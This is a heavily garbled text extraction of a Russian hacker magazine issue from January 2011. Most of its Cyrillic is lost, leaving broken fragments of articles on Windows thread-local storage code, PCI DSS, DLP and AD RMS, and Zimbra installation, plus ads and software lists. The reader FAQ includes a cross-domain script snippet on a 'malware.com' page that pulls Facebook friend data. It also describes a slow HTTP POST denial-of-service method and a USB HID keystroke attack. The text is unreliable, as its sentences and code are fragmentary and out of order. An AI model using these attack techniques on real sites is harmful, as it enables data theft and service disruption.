, , TlsAlloc. API ,
.
TLS

, .
WinMain TlsAlloc,

PVOID. ,
TLS , , , .

TlsFree.
TLS
// TLS
DWORD tls_i;
DWORD tls_char;
//
DWORD WINAPI ThreadFunc( LPVOID lpParam )
117
CODING
{
TlsSetValue(tls_i, lpParam);
char *char_buf = new char[25];
lstrcpy(char_buf,"array of char");
TlsSetValue(tls_char, char_buf);
char szMsg[80];
int i = TlsGetValue(tls_i);
wsprintf( szMsg, "Parameter = %d.", i );
TLS
// TLS-
__declspec(thread) int tls_i;
__declspec(thread) char tls_char[25];
//
DWORD WINAPI ThreadFunc(
LPVOID lpParam )
{
tls_i = (int)lpParam;
lstrcpy(tls_char,"array of char");

char szMsg[80];
delete[] char_buf;
wsprintf( szMsg, "Parameter = %d.", tls_i );
return 0;
}
return 0;
LPSTR lpCmdLine,
int nCmdShow)
{
DWORD dwThreadId;
tls_i = TlsAlloc();
tls_char = TlsAlloc();
}
LPSTR lpCmdLine,
int nCmdShow)
{
DWORD dwThreadId;
Sleep(10000);
// 10
Sleep(10000);
// 10
TlsFree(tls_i);
TlsFree(tls_char);
return 0;
}
,
, ,
, .

TLS-.
thread-local storage
TLS

. thread-local
storage .
PE-, .tls
( ), ,

. TLS,
, , .
,
API thread-local storage,
C++. .
118
return 0;
}
__declspec(thread),
TLS-.
, , ,

WinAPI.
, . tls_char
, TLS,
CHAR. ,
(1088 Windows XP), , tls_char , 25 threadlocal storage. ,
dll, , , TLS.
, ,
. TLS
,
.
, TLS
.
,
thread-local storage . z
X 01 (144) 2011
E-INK
, ,
. 7-8 , , ,
. ? ? Wexler Wexler Book T7001, 4-
!
Wexler Book
T7001
7- TFT-.

E-Ink,
,
Wexler
:
,

.
, ,

DVD-RIP.

4 ,
MicroSD ( 16
)
.

, FM-

.

: TXT, PDF, FB2, RTF, EPUB, HTML
: AVI, Xvid, Divx 4/5, RM, RMVB, FLV, KV
: JPG, BMP, GIF
: MP3, WMA, APE, FLAC, AAC
: , FM-,
: 200x132x13
: 300
: www.wexler.ru
3990 .

,

5 ,
7 .
6 .

.

PDF.

.

.
Wexler Book T7001

.

.
SYN/ACK
c0n Difesa condifesa@gmail.com, http://defec.ru

PCI DSS

(PCI DSS) ,
.
?
, .
: -, -
, .
, ,

.
-,
.
,
, .

, , -
-
- (). , ,

().

,
, , .
(Payment
Card Industry Security Standards Council, PCI SSC),
(Visa, MasterCard, American
Express, Discover, JCB), ,
(Payment Card Industry
Data Security Standard, PCI DSS).
.

. , , ,
,
. PCI DSS, ,
,
.
:
,
120
, .
- , ,
.
PCI DSS
,
, ,
,
,
, . ,
PCI DSS
, ,
, .
:
1. (Glossary);
2. (Payment
Card Industry Data Security Standard);
3. (PCI
DSS Security Audit Procedures);
4. (PCI DSS Security Scanning
Procedures);
5. , QSA- (PCI DSS Validation
Requirements for Qualified Security Assessors);
6. , (PCI DSS
Validation Requirements for Approved Scanning Vendors);
7. PCI DSS (Navigating PCI DSS Document);
8. PCI DSS
(Prioritized Approach for PCI DSS);
9. (PCI DSS Self-Assessment Questionnaire);
10. (
, ).
, , ,

, ,
.
PCI DSS, ,
, X 01 (144) 2011
, ,
.

. 7-9
( ) , ,
, (
-) :
PCI DSS( 7)
12 PCI DSS ( 1)
, ;
( 8) ,
, ,
, , ,
.

PCI DSS ,
, -
,
,
.
( 1-6
) , ,
, QSA.
PCI DSS
.
-

, . , ,

, ,
, ,
, , X 01 (144) 2011
,
,
. , ,

,
.

PCI DSS,
, (PAN).
,
, .
, ,
PAN ,
, .
,

, , , CVV2
(Card Verification Value 2
Visa) CVC2 (
MasterCard)
, , . , , -

-.
PCI DSS (,
, -)
, CVC2
CVV2 online-.

,
, PCI DSS,
, ,
.
, , -
HTTP://WWW
links
http://pcidss.ru/
articles/22.html

2.0
PCI DSS.
https://www.
pcisecuritystandards.
org/security_
standards/
documents.php

PCI DSS
v2.0 .
http://www.xakep.ru/
post/49549/ :
PCI
DSS.

.
121
SYN/ACK
Payment Card
Industry (PCI) Data
Security Standard
,
PCI DSS
PCI DSS Security

Audit Procedures
PCI DSS Security

Scanning
Procedures
Glossary
Navigating PCI
DSS Document

PCI DSS
PCI DSS SAQ

(A, B, C, D)
Prioritized
Approach for PCI
DSS

- ,
, .
. ,
.
-
, .
PCI DSS , ( )
( ).

, ,
.
PCI DSS , ,
.
:
1. ,
, ;
2.

;
3. - ,
( ) .
PCI DSS v2.0 ( 28 2010 ). 12

.
122
( 1 2). ,

, , . : .

. ,

.

( ),
1.4,

(
) , ,
. :

, ,
, .
,
. , 2.2.4,
: , , , , ,
-. ,
,
.
(
3 4) (, ..) ,
,
X 01 (144) 2011
3.4
PCI DSS
CAV2/CVC2/CVV2/CID
PIN / PIN Blok

(PAN)
(ardholder Name)

(Service Code)

(Expiration Date)
,
,
.
. ,

( -
),
,

. ,
,
(,
),

,
.
, 5 6,
. ,
, :
,
,
,
-. ,
,
, -
11.
(7, 8 9)
-

,
.
, ,

. -

.
X 01 (144) 2011

. , , ASV,
. , ,

PCI DSS ASV-
( 11.2 11.3) ,
.
,
, , ,
,
.
12 :
,
- . 12.1.1
, PCI
DSS. - -,
, , ,
,
.

-
.
INFO
info

(PCI DSS v2.0 28
2010 )

.

.
WARNING
warning

PCI DSS v1.2.
. ,
,

.
,
,
,
,
PCI DSS.z
123
SYN/ACK
luchnik@it-university.ru
DLP, IRM WS2008

,
?

DLP IRM, .
IRM DLP , Windows Server 2008.

, . ,
.

,
. , ,
, DRM (DigitalRightsManagement,
DigitalRestrictionsManagement).
( ,
, )
:
EDRM Enterprise Digital Rights Management
ERM Enterprise Rights Management
IRM Information Rights Management
RMS Rights Management Services, Microsoft IRM

.
. ,

, , ,
,
. ,
, :
,
e-mail
;
, ,
, , .
DLP (DataLeakage
(Loss)Prevention) , .
124
DLP IRM
?
, , DLP
IRM. (IBM, Cisco, RSA ( EMC), Oracle, Microsoft, CheckPoint, Symantec)
.
,
. ,
,
.
DLP- :
Data-at-Rest. , , , . ,
, .
Data-in-Motion. (, , ) ,
.
Data-in-Use. , ,
.
DLP-
. , ,
,
-. ,
. DLP- ,
.
, , (,
), ,
,
, .
,
X 01 (144) 2011
2.
AD RMS.
, DLP-

.
, ,
, . , , .
-, , ,
, , .
DLP- . , , . ,
//
, DLP-, . .
, ,
, , , ,

. DLP-
.

, , , ,
? IRM-.
IRM . , . DRM,
, IRM
, . IRM
.
DLP IRM . DLP
,
X 01 (144) 2011
. DLP ,
.
,
IRM.
AD RMS?
ActiveDirectory (AD RMS;

Windows Server 2008, Rights Management Services
) IRM-,
. ADRMS
. , Share Point
,
. , Windows Server
2008 R2 File Classification Infrastructure,
, , ,
. AD RMS : Full Control, View, Edit, Save, Extract, Export, Print, Allow
Macros, Forward, Reply, Reply All, View Rights. AD RMS
:
Word, Excel, PowerPoint InfoPath, 2003
. , Microsoft Office Ultimate 2007,
OfficeEnterprise 2007, Office Professional Plus 2007 Office 2003
Profession, , ,
AD RMS.
Microsoft XML Paper Specification (XPS).
MS
:
pdf- Foxit
PDF Security Suite, GigaTrust Enterprise, Liquid
Machines Secure Islands. Foxit
pdf- Microsoft Office
Share Point Server. GigaTrust ,

.
125
SYN/ACK
4. WatchDox
3. AD RMS
1. ,
AD RMS

CAD- .
ADRMS
Software Development Kit (SDK),
,
ADRMS.
ADRMS
, , , . 1
. 2
, :
126
1. , , RAC CLC AD RMS.

2. , AD RMS,

. , , , AD RMS .
publishing license,
. AD RMS
, . , CLC.
3. .
RAC. , AD RMS .
4.
use license AD RMS, publishing license. publishing
license, .
X 01 (144) 2011

DRM-. SaaS Watchdox
Confidela,
AmazonWebServices. Watch Dox Secure file sharing
www.watchdox.com,
(View, Print, Edit, Forward, Spotlight Copy/Paste),
.
.
-, ,
. ,
, , ,
.

e-mail, .
,
. ,
e-mail.
HTTPS, AES.
, ,
,
(. 4). Spotlight,
,
.
, , ,
.

,
e-mail, ( e-mail ,
,
Confidela
).
5. , .
, use license,

(, ).
6. ,
, , , .
ADRMS
ADRMS :
Active Directory Domain Services (ADDS)
URL AD RMS Service Connection Point (SCP)
. AD RMS
.

Microsoft SQL Server , Windows
Server 2008.
, AD
RMS, Web Server (IIS).
X 01 (144) 2011

technet.microsoft.com/en-us/library/dd772697(WS.10).aspx

.
www.xrml.org eXtensible Rights Markup Language ,
ADRMS.
DRL-
IRM- : DLP- (www.bytemag.ru/articles/detail.
php?ID=16748), GroupTest: DRM & DLP tools (www.scmagazineus.
com/grouptest-drm--dlp-tools/printgrouptest/182/), DLP (www.cnews.ru/reviews/free/
security2009/articles/dpl.shtml).
Windows XP, Windows 2000 Windows Server 2003

AD RMS Microsoft Windows Rights Management
Services Client.
AD RMS
(. 3), :
Active Directory Rights Management Services Identity Federation
Support, AD FS AD RMS
. AD RMS
. AD RMS , Service Connection Point
Enterprise Admins.
,
,
AD RMS. ( CNAME) DNS- URL
AD RMS SQL-, AD RMS.
AD RMS (Rights Policy Templates), ,
,
. ,
,
.
, ,
offline-. ,
offline-,
AD RMS , (

, , Office 2007 HKEY_
CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Common\
DRM\AdminTemplatePath).
DLP- IRM- ,
.
, ,
. AD RMS,
,
IRM- ,
, ,
. , AD
RMS DLP-, ,
RSADLP..z
127
SYN/ACK
grinder grinder@ua.fm, tux.in.ua

Zimbra:

must have
.
, , .
Zimbra Collaboration Suite (ZCS), ,
.
ZCS
Zimbra Inc.
2007 , .

OpenSource , ,
. 2007
Yahoo!, 2010 VMware.
Zimbra ,
. ,
POP/POPS IMAP/
IMAPS -.
ClamAV. ,

,
,
Zimbra. ,
Zimbra,
.
Zimbra
(Jabber), ,
,
WYSIWYG Zimbra Document.
RTF, HTML, ,
. , Zimbra Document
, .
.
,
( URL).
e-mail RSS/Atom.
, e-mail. -
128
, , .
Zimbra
(Windows Mobile, iPhone, Nokia E ), - , .
,
LDAP , ActiveDirectory.
API,
zimlets Zimbra.
ZCS ,
, ,
. Zimbra .
, .
-
. Zimbra Server Java,
POP3/IMAP , OpenSource ,
nginx, Apache Lucene, OpenLDAP, MySQL, Postfix, POP3/
IMAP4 Perdition, ClamAV, DSPAM .
- Zimbra Web Client ,
-
.
AJAX,
. , ,
,
, ,
Skype Ekiga,
.
, , Zimbra Desktop, (, , ),
X 01 (144) 2011
IMAP/POP3 .
ZCS : Open Source Edition,
Network Edition (Starter, Standard Professional) Zimbra
Appliance (Basic, Standard).
OpenSource- ZPL
(Zimbra Public License).
,
,
Zimbra
.
,

MS Outlook, ,
(. zimbra.com/
products/compare_products.html).
, "" OpenSource
.
, Wiki
, Zimbra.
Open Source Edition .
ZCS OpenSource
Edition
6.0.8, Ubuntu
10.04 LTS. 32 x64
Linux (Red Hat Enterprise, Fedora, Ubuntu, Debian,
Mandriva, SUSE Linux) Mac OS X.
. Ubuntu
6.06 8.04 LTS,
10.04 -
. ,
X 01 (144) 2011
.
DNS , A MX
.

, 10 .
, .
64- .
$ wget -c http://files2.zimbra.com/
downloads/6.0.8_GA/zcs-6.0.8_GA_2661.
UBUNTU8_64.20100820044710.tgz
.
$ tar xzvf zcs-6.0.8_GA_2661.
UBUNTU8_64.20100820044710.tgz
$ cd zcs-6.0.8_GA_2661.
UBUNTU8_64.20100820044710
Ubuntu 10.04 , --platform-override:
HTTP://WWW
links
Zimbra
zimbra.com

Zimbra
zimbra.com/products/
compare_products.
html

wiki.zimbra.com/wiki/
User_Migration
INFO
$ ./install.sh --platform-override

Zimbra, .
/etc/hosts
.
, .
- ,
MISSING, . ,
.
info

Zimbra: 22, 25, 80,
110, 143, 389, 443, 993,
995, 7025.
129
SYN/ACK

-
$ sudo apt-get install libpcre3 libgmp3c2 libgmp3-dev
sysstat libexpat1 wget
,
(
11). ,
zimbra-memcached zimbra-proxy ( POP3, IMAP
HTTP). , zimbra-proxy, memcached .
. ,
. DNS
Zimbra, (A MX) /etc/hosts, .
,
. , ,
. Admin
Password, .
.
, 3, ,
Admin Password ( ***),
. , r, s a (
) q.
. ,
/opt/zimbra/log.
Zimbra , . :
$ ./install.sh --uninstall
/opt/zimbra, .
- Zimbra
.
, URL
. ,
(HTML), (AJAX) . , AJAX, , .

,
.
, , , ,
130
. ,
. , -
,
. - Zimbra
, .
- 7071 .
https://server.com:7071,
admin .
,
.
:
, ,
,
;
, , (, )
, zemlets
, ;

( , ,
CPU,
);
, ;
(,
, ).
,
,
, - .
,
, .

, wiki -.

.
CSV,
. ,
, . :
user@domain.com,name,password
, ,
.
X 01 (144) 2011
, .

, .. Zimbra .
, - to Zimbra migration.
Zimlet, .
.
, default
,
, .
,

. (
).
.
, ,
. .
. ,
.

, ,
, MTA, POP, IMAP, Exchange
.
, :
, .

.
6 zimlets.
/opt/zimbra/zimlets*.
, Zimlets,
zip .
zimlets ( )
. .
Zimbra
-, Zimbra ,
zimbra.
Zimbra CLI
Commands (zimbra.com/docs/os/6.0.8/administration_guide).
service zimbra status
zmcontrol.
zmcontrol (status | stop | start | maintenance | startup)

. ,
-H .
zmaccts , zmprov
LDAP,
,
.
.

Wiki- (wiki.zimbra.com/wiki/User_Migration).
.

. ,
. default,
Zimbra.

, , .
7 , , (HTML AJAX), ,
, ,
X 01 (144) 2011
, ,
, ,

.
, *nix .
.z
131
!
800 !
8.5
DVD
191
2200
23%
30 ,
31 ,
31 .
FOCUS ST: , 25 ""

C !
. 46
""?

TOYOTA CELICA LEXUS IS-F LEXUS IS TOYOTA SUPRA
MITSUBISHI LEGNUM -21123 ACURA SLX BMW Z4
MITSUBISHI LANCER MERCEDES S-CLASS SUBARU IMPREZA
FORD CAPRI
SEAT EXEO

AUDI A4?
FORNASARI
09 (96) 2010
. 14
-
-
56
NOKIA N8

WWW.T3.RU
10 (10 5) 2 010
. 3 8

?
. 9 2

. 6 0
www.photo-mast.ru
11 (66) 2010 //

SAMSUNG
PS3
MAMM

iPAD?
BLACKBERRY
TORCH

XBOX
132
. 36
HOMEFRONT
publishing for enthusias
+ DVD
DVDXpert
nj}p
n
WWWCROSSSTITCHERRU
. 42
BATMAN: ARKHAM CITY

HOT PURSUIT
PC
+ 2 DVD
:
[]
CANON IXUS 210

SONY CYBER-SHOT WX5
Digital Photo
+ DVD
11
+ DVD

CORSAIR H70
47
SAMSUNG
+ DVD
04 (16) 2010
BOLIVAR
,
,

l

BOSSNER
15

p
. 74
NEED FOR SPEED:
l_wodhqglb k

p

NAS INTEL ATOM
3D Blu-ray Samsung HT-C6950W| v[duck] A211C

3D, ( II)| ?
Yamaha NP-S2000| Diapason NUX II
`
CIVILIZATION 5
. 66
T+A = M10

155 .
250
SSD

3D
Blu-ray-
DVD
+ DVD
3D
Zappos.com

30
#11 |81| 2010
91
(91) 2010
WWW.DIGITAL- PHOTO.RU
DVD
21,8
$
www.mybiz.ru
BLU-RAY
P 230
. 26
DVD -
: PHOTOKINA 2010.
: 250
DVD PC
2
15
-,
Total Football
+ DVD
11
. 38

. 44
PC : NEED FOR SPEED

| | | DVD | BLU-RAY | - | AV-
#11(83) 2010
Eli Lilly
04 (16) 2010
19
2
+
2010/11
www.frsg.ru

+ DVD

. 110
. 60
| 2010
Playboy Torpedo
5
14
. 104
ENSLAVED:
ODYSSEY
TO THE WEST
11 2010
GRAN
TURISMO 5
| 2010 | 10 74
""

CIVIC EK3 20
10 2010
UP
LEVEL
. 116
. 124
: GEFORCE SLI RADEON
200 .
2010

www.totalfootball.ru
o
100 .
CITROEN
. 42
DS4

22

250
. 68
TOYOTA ALTEZZA
11 58 2010
"24 "
Chevrolet Spark
1328

? . 88
""
MERCEDES
150
PC PS2 PS3 WII XBOX 360 DS PSP

. 58
MEDAL OF HONOR . 94
DUKE NUKEM . 78
XBOX 360 . 68
DEAD RISING 2 . 116
VANQUISH . 128
WWW.TUNINGAUTO.RU
[ 11 2010]
WWW.TUNINGAUTO.RU
RETROACTIVE
TITSBUSTER
18 | 315 | 2010
. 18
TOKYO GAME SHOW 2010
3D-

hde|z
gUbqZ
WaûhZarcqZ
!"-!
eZfgdcU\^
iMAC

g
p
n
s
_
T3
Smoke
! !
: GEFORCE SLI RADEON
. 60
x 12 (143) 2010
.
: 210

DIGITAL FORENSIC: . 34
DVD
12 (143) 2010
0day /
WINDOWS
. 48
#11 |81| 2010
3D
SSD

,
?
C. 62
NAS INTEL ATOM
143
HTML5
VIRTUALBOX TIPSNTRICKS
.NET
WIN32.WHISTLER

OBJECTIVE-C
MAC OS X IPHONE
. 96

CORSAIR H70
47
SAMSUNG

+ + 2 DVD: 162
( 35% , )
+
12 3890 (24 )
6 2205 (12 )
,
.

,

, :
!
1. ,
,
http://shop.glc.ru.
2. .
3. :
subscribe@glc.ru;
(495) 545-09-06;
115280, , . , 19,
, 5 ., 21. . .
.

72 000 QIWI
() .
!
.
,
. , , .
, .
( )

. .
6 c 1260 ( ).
6
R-kiosk , . , .27-31 648 .
,
.
(495) 663-82-77 ( ) 8-800-200-3-999 ( ,

, ). , /
INFO@GLC.RU SHOP.GLC.RU .
UNITS
Oriyana oriyana@xpsycho.ru
PSYCHO:

Smart has the brains, stupid has the balls, Diesel. . balls
, balls brains , . , .
, ,
.
, ,
: ,
.
,
, .
,
,
, .
.
; , , .
.
.
,
, .
. , ,
.
, .
.

,

?
,
.
, , .
:

:
134
;

;

(
);
,
, , ,
;

( , );
, , , ;
,
.
.

.
: (
), ( )
( ).
,
. :
, , (, )
,
, (-, - ).

, . ,
, , ,
,
.
,
,

. ,
,
, ,

, ,

.
,
, ,
. ,

,
, . ,
-
.

X 01 (144) 2011
,
, ;
70-80% ,
. ,
, , , ,
? .
,
,
,
.
.
,
, ,
.
, ;

,

.

,
:
. ( ):
(, ),

. ,
, , , , ;
,
; ,
, ,

.
. ():
,

, (
) ; ,
,
X 01 (144) 2011
, , . ,

. ,
.
. : ,

, ,
, ,
;
, , ,
.
, . ,
,
,
(),

(, , , ),
().
, ,
.
,
,
(, ),
, ( ); ,
, , .
,
, .

,
.
.
,
, , ][,
ASP.NET; , ,
.
(
) (
)
. ,
,
,
ASP.NET
, .

,
.
,
(
, 2009) (-
, , 2010)

, ,
(
; , ,
][). ,
,

, ,
,
-
.
, , ,
,
,

.
.

,

, ,
( ,
,
135
UNITS
,
).
, ,
,
,
?
?
1. , ,
: (), .
( + ).
,
,
(, ):
(

, ,
. ).

, (
;

, .
+ ).
, , , , . ,
; , ,
(
).
,
. ().
2. . ,
? ,
;
, , .

, .
, ,

,
,
. ,
.
, 6 ,
,
,
:
,
, .
, ( ), , -

, ,
, , ,
, , .
, ,

,
.

, ,
.
,
, -

; ,
.
- , ,
. ,
, ,

136
,
.
,
? .
1. ( ),
.
,
,
:
- ; , ,
;
- ;
QWERTY
,
;
- ,
:
, .
2.
,
,
.
:
, -.
:

( ,
),

,
.

(
), ,
.
,
.
3.
, .
,

, , , ;
,
.
4. ;
,
,

.
, ,
.
, , , , , .
5. .

.
: , ,

( ).

,
:
,

,

.
X 01 (144) 2011
. ,
, ( )
,
1,2,3,4
.. .
3. .

. , ,
, , .
,
, , , -
, , , ,

. , ,
, .
4. .
,
, , ,

.

:

X 01 (144) 2011
.
,
, , , , , ..

, .
,
.
5. . ,
. ?
,
, , ,
. ,
, ; ,
,
, , ,
-
.
, , , ,
,
.
, . , .
,

.
6. .
,
- ,

, -
,
,
,
-.
,

( ) . ,
-
, :

,
.
,
,
,
.

. ,

. , .

.
,
137
UNITS

- -.
,
,
, .
, - . , ,
,
, .

(:
.
, ,
). injection
138
, .
(
) ,
. ,
.

:
. ?
. , .
, ,
, , ,
. ,

, ,

, ,

,
.
: ABC!
!

: ABC
.
-,
.
,
, , . ,

,

.
, , .
, , ,
, ,
.
,
stupid&funky,

. , , ][
,
, smart is a new sexy :).z
X 01 (144) 2011
UNITS
step witter.com/stepah, ant
faq
united?

faq@real.xakep.ru
Q: . , .

R-Studio.
, . ,
, .
.
A: , ,
, .

NTFS Undelete (www.ntfsundelete.com).
- : ,

.
. ,
( R-Studio),
,

, NTFS Undelete .
, ,
, .
, -
. Linux MacOS (,
Windows) PhotoRec (www.cgsecurity.org).
140
Q:
, USB. ?
A: ,
,
.
-. , USBTrace (www.sysnucleus.com) USB
Monitor (www.hhdsoftware.com).
-, USB- .
- (
, ) ,

(
, ),
, . , ,
Microsoft
Kinect.
OpenKinect
(openkinect.org).
Q: ,

?
A: Process Explorer
.
DLL
, .

. , ,
,
.
Q: , SSH

, . ,
?
A: , ,
. ,
Linux Windows.
1. ssh X11:
/etc/ssh/sshd_config Ensure
X11Forwarding yes.
2. Windows -, ,
Xming (www.straightrunning.com/XmingNotes).
,
Display.
Multiple windows and set
the Display .
3. SSH PuTTY.
Connection SSH X11. Enable X11 forwarding X
display location :0.0.
4. ,
,
X 01 /144/ 2011
X11
NTFS Undelete
SSH-.

GUI- ( Firefox).
.
Q: USB- ( exe-),
?
A: ,
Defcon', Teensy USB HID Attack Vector.

, .
:
, autorun.inf

.
USB-, ,
HID- (Human Interface Device).
,
. ,
(Teensy USB Board) $18,
.
bit.ly/programmable-hid-usbkeystroke-dongle.
Q:
Microsoft Office Google
Docs?
. ,

Google.
A: ,
OffiSync (offisync.com).
X 01 /144/ 2011
Microsoft Office,
,
Microsoft Office Google Docs.

, Google. ?
, ,
.
, Google
, (
Google Cloud Connect),
.
OpenOffice ,
ooo2gd (code.google.com/p/ooo2gd).
Google
Docs, Zoho (www.zoho.
com), WebDAV
( ,
).
Q: , Firefox
?
Q:
,
fingerprinting, 2008 .

WhiteHat Security (jeremiahgrossman.blogspot.
com/2006/08/i-know-what-youve-got-firefox.
html).

. , ,
,
, , User-Agent
- .
,
JavaScript API. ,
Firebug,

JavaScript- console.
,

.
Q: AJAX-,

while(1);
for(;;);. ?
A: ,
(cross
domain attacks). ,
for/while . , Facebook.
malware.
com. ,
:
<script src="facebook.com/ajax/
friends.php" />
, malware.
com friends.php, ,
Facebook. ,
malware.com
,
AJAX- ,
malware.com
script, for/while .
Facebook? AJAX-,

.
malware.com -
,
XMLHTTPRequest .
Q:

PHP-?
A: PHP , ... .
-
( , -
141
UNITS
,
.
Q:
,

?

, , .
A: ,
Must Have SSD-

),

. PHP

.
- ,
PHP.
Q: -
-,
DDoS-?
A: , .
OWASP (www.owasp.org/images/4/43/
Layer_7_DDOS.pdf), DDoS-
-.
,
- -,
HTTP-. ,
,
, , , . ?
-.

Content-Length, -
(, Content-Length: 10000000).
, - 10000000
.
,
,
,
10-100 .
, - (
, ).
-
. ,
,
.
142
, , .. HTTP POST-.
, Apache,
.
.
Acunetix WVS
(www.acunetix.com/blog/wp-content/
uploads/2010/11/wvs-scripting1.png),
256 TCP- -, ,
, (1 ).
HTTP POST- (POST /aaaaaaaaaaaa HTTP/1.1).
DDoS . ,
20000 .
, Apache',
MaxClients.
256
. .
Q: -,
HTTP-
,
?
A: Sergio
Proxy (spareclockcycles.org/downloads/code/
sergio_proxy_v0.1.tar.gz). Python .
Q: ][ ?
A: ,
: LordPE OllyDump.
, , :

, ,
. ,

exe-,
, , .
. - , , ,
, ,
. ,
()
.
,
() .

( ), .
,
.
.
, .
Windows XP,
.
.
snapshot
. ,
Temporary Internet Files (, ..),
, .
- ,
. ,
. ,
.
:
Norton Safe Web (safeweb.norton.com), WOT
(www.mywot.com), McAfee Site Advisor (www.
siteadvisor.com). ,

,
. , xakep.ru
,
( ).
, - -

, . :
Site Advisor ,

. z
X 01 /144/ 2011
>Security
Agnitio
API Monitor v2 r3
BlackSheep
CryptoNark
CUDA-Multiforcer 0.72
>Net
App for the milk - 0360
Firefox 4.0 Beta 7
GMail Drive (Beta) 1.0.17 Beta
GNS3 Graphical Network Simulator
0.72
MailStore Home 4.1.0
PeerBlock 1.1
Safari for Windows 5.0.3
Serv-U 10.3.0.1
UltraVNC 1.0.9.1
WATOBO 0.9.5
WeFi 4.0.1.0
Wireshark for Windows 1.4.2
Xming X Server for Windows
6.9.0.31
zButterflySetup 1.2.0
>Multimedia
1by1 1.72
Adobe Reader X
doPDF 7.1.351
Foxit Reader 4.3
Free Video Converter 1.3.0
Jing
LibreOffice Beta3
Machete Lite 3.6
Paint.NET 3.5.6
ProgDVB 6.49.4
REAPER 3.73
TagScanner 5.1.594
VidCoder 0.7.0
>Misc
All-In-One Tray v1.0
BlueScreenView 1.29
Dictionary.Net 3.0
Eraser 6.0.8
Find and Run Robot (FARR) 2.93.1
GmailDefaultMaker 2.0.1.4
HTC Home 1.10
ManicTime v1.4.8
NirCmd v2.46
Offisync
PasteBoard 2.1
Print Suite .Net 1.1
SE-DesktopConstructor 1.1.1
SingleInstance v1.0
TreeSize Free 2.5.1
windroplr 1.3
>>WINDOWS
>Development
IE Collection 1.7.0.5
Python 2.7.1
Python 3.1.3
Qt SDK for Windows
Zend Studio 8
>Devel
Check 0.9.8
Claw 1.6.1
dlib 17.32
>UNIX
>Desktop
Adobe Reader 9.4
gCue2tracks 0.5.0
Gnac 0.2.2
KSmoothDock 4.5
Liquid Weather 15.0
MathGL 1.11
MyTetra 1.26
PyPanel 2.4
qRFCView 0.62
QtCurve 1.7
Sage 4.6
Strigi 0.6.4
SystemClean 1.2
TuxCards 2.2.1
Udav 0.7
VLC 1.1.5
VYM 1.12.8
Xcowsay 1.3
>Games
Smokin Guns 1.0
>System
Cameyo 1.55
CCEnhancer 2.0
ClearCloud
CrystalDiskInfo 3.9.3a
EASEUS Partition Master Home
Edition 6.5.2
ERUNT GUI 1.2.5
EventLog Inspector 2.5.0.605
HWiNFO32 3.62
Logstalgia 1.0.0
Malwarebytes Anti-Malware 1.46
Moo0 SystemMonitor 1.62
Nomad.NET 2.8.7 RC
Process Lasso v4.00.23
RouterPassView 1.20
Secunia PSI 2.0 BETA
SmartPower 1.0.0
Soluto 1.1 Beta
SSDlife Free 1.0.12
USB Monitor
USBTrace 2.5.4
Web Log Storming 2.4.1
>Security
Alliance 1.0.6
BlackSheep
Chkrootkit 0.49
Column Finder 1.1
Crunch 2.6
CUDA-Multiforcer 0.72
Ddosim 0.2
Fierce Domain Scan 2
File Ripper
GNS3 0.7.2
NiX Brute Forcer 1.0.3
PAC 2.5.3
Privoxy 3.0.17
Retroshare 0.5.0
RIPS 0.35
SinFP 2.06
Snort 2.9.0.1
SQL Injection Vulnerability Scanner
> Chrome:
AdBlock 2.2.7
AdThwart 1.0.13
Chrome TV 2.0.3
Click and Clean 4.0.0.0
Facebook Fixer 1.0
Google Calendar Checker 1.1.0
Google Mail Checker 3.1
Google Translate 1.2.3.1
Xmarks 0.9
>Net
BottomFeeder 4.6
EiskaltDC++ 2.1.0
Google Chrome 7.0.517.44
Mozilla Firefox 3.6.12
Opera 10.63
pDonkey 0.05
QGoogleTranslator 1.2.0
NiX ProxyChecker 1.5.1
SABnzbd 0.5.6
Torrentflux 2.4
TorrentSniff 0.3.0
TvRss 1.8
TwitMail 0.42
Vacuum IM 1.0.2
FreePascal 2.4.2
KlassModeler 0.8
Lazarus 0.9.28.3
LeakTracer 2.4
libcfg+ 0.6.2
libconfig 1.4.6
Loki 0.1.7
Makepp 1.50
Mercurial 1.7.1
Nemiver 0.8.0
Premake 4.3
PScan 1.3
Redcar 0.8.1
Szl 1.0
Webspec 1.2.1
Digital Forensics Framework 0.8.0

filefolderenum v1.0.8
Malware Analyzer 2.6.2
mdmp 0.2.4
Nessus 4.4.0
NetTool 4.7.2
NoVirusThanks Anti-Rootkit 1.1.0.0
FREE
plecost 0.2.2.9 beta
Proxocket 0.1.5
Sandcat 4.0.3.0
SandKit
SiteDigger v3.0
Watcher 1.4.1
XSSER 1.0
>>MAC
Alfred 0.7.2b
AppFresh 0.8
Bash Completion 1.2
Bonjour Browser 1.5.6
Chax 3.0.2
Deeper 1.2.6
Dropbox 0.7.110
Evernote
Hex Fiend 2.0
Homebrew 0.1
iStat Pro 4.92
Maintenance 1.3.4
Perian 1.2.1
RoundCube 0.4.2
Skype 2.8
>X-distr
Fedora 14
>System
ATI Catalyst 10.11
DirComp 1.3.10
KleanSweep 0.2.9
Lfm 2.2
Linux Kernel 2.6.36.1
Lxde 0.4.5
Magic Rescue 1.1.9
man-pages 3.31
Nrg2Iso 0.4
nVidia 260.19.21
SeaTools
VirtualBox 3.2.10
Wayland
Wine 1.2.1
Xorg 7.5
>Server
Accel-pptp 1.2.0
Apache 2.2.17
Axigen Mail Server 7.6
BIND 9.7.2-P2
CUPS 1.4.5
DFileServer 1.1.3
DHCP 4.1.2
MariaDB 5.2.3
mod_pagespeed
OpenLDAP 2.4.23
OpenSSH 5.6
Pagespeed 1.9
Squid 3.1.9
Thttpd 2.25
Verlihub 0.9.8e
wwwoffle 2.9
Xitami 5.0a
Yaws 1.89
0.5
SWFIntruder 0.9.1
XSSer 1.0
01(144) 2011

ICQ

CSRSS
VPN
AMAZON

2010
01 (144) 2011
: . 32

: 2
10
.
UNITS
HTTP://WWW2
WHOER
www.whoer.net
SURFPATROL
www.surfpatrol.ru
- , IP-
. - Java- Flash-.
,
, ,
Whoer. Proxy- Socks-,
VPN-, IP-
-, , ActiveX Java,
, , DNS
..

. ,
-.
, (Adobe Reader, Sun Java, QuickTime, Adobe Flash,
Silverlight ) .
SurfPatrol Positive Technologies , - . - ,
.
SHIFTEDIT
www.shiftedit.net
JAYCUT
www.jaycut.com

, PHP-.
shiftEDIT ,
(S)FTP-
. ,
,
, .
:
.
, WYSIWYG- .
, ,
( )
(, , ). JayCut
, . , -.
, ,
( ),
, -,
-
JayCut.
144
X 01 (144) 2011
>> coding
3 -
: 12 , 6
3 .
, ? ? .
- .

Хакер 2011 01 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

